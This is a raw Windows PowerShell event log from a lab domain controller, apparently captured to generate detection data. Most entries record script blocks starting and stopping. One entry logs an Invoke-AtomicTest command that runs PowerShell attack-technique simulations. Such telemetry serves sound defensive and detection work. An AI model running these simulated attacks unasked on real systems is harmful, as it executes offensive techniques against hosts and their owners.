Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477298
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477297
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477296
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477295
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477294
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477293
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477292
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477291
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477290
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477289
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477288
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477287
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477286
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477285
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477284
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477283
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477282
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477281
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477280
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477279
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477278
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477277
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477276
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477275
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477274
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477273
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477272
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477271
Keywords=None
Message=Completed invocation of ScriptBlock ID: b459aaab-de7d-420a-80f5-5c41c18dff6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477270
Keywords=None
Message=Started invocation of ScriptBlock ID: b459aaab-de7d-420a-80f5-5c41c18dff6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477269
Keywords=None
Message=Started invocation of ScriptBlock ID: 9977b850-34e8-42e4-a697-d3c6bfbce619
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477268
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09cb335e-396f-45bc-bf57-1b3b9cd655fd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477267
Keywords=None
Message=Started invocation of ScriptBlock ID: 09cb335e-396f-45bc-bf57-1b3b9cd655fd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477266
Keywords=None
Message=Started invocation of ScriptBlock ID: 655b8275-a22b-43b3-b24c-cb331813dd7f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477265
Keywords=None
Message=Creating Scriptblock text (1 of 1):
Invoke-AtomicTest T1059.001 -TestNumbers 11,12,13

ScriptBlock ID: 655b8275-a22b-43b3-b24c-cb331813dd7f
Path:
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477264
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477627
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477626
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6f0a5e8-f5a8-4443-8fee-47630747e7fe
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477625
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477624
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477623
Keywords=None
Message=Started invocation of ScriptBlock ID: d6f0a5e8-f5a8-4443-8fee-47630747e7fe
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477622
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: d6f0a5e8-f5a8-4443-8fee-47630747e7fe
Path:
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477621
Keywords=None
Message=Completed invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477620
Keywords=None
Message=Started invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477619
Keywords=None
Message=Completed invocation of ScriptBlock ID: 655b8275-a22b-43b3-b24c-cb331813dd7f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477618
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9977b850-34e8-42e4-a697-d3c6bfbce619
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477617
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477616
Keywords=None
Message=Completed invocation of ScriptBlock ID: a91726dd-e6d1-43d0-8248-4e56a5b3429d
Runspace ID: 9c2bf95d-aa5c-439e-b1a2-ccb0994588f6
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477615
Keywords=None
Message=Started invocation of ScriptBlock ID: a91726dd-e6d1-43d0-8248-4e56a5b3429d
Runspace ID: 9c2bf95d-aa5c-439e-b1a2-ccb0994588f6
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1477614
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$global:?

ScriptBlock ID: a91726dd-e6d1-43d0-8248-4e56a5b3429d
Path:
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477613
Keywords=None
Message=Completed invocation of ScriptBlock ID: f3d5f304-5803-4515-a701-a05bc6b9a677
Runspace ID: 9c2bf95d-aa5c-439e-b1a2-ccb0994588f6
06/15/2021 05:05:30 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477612
Keywords=None
Message=Completed invocation of ScriptBlock ID: ddf0721b-9309-4e53-bf91-f4b22c9856e0
Runspace ID: 9c2bf95d-aa5c-439e-b1a2-ccb0994588f6
06/15/2021 05:05:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477641
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477640
Keywords=None
Message=Completed invocation of ScriptBlock ID: e0b9a6bc-5548-4650-801c-40cf49750120
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477639
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477638
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:05:31 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
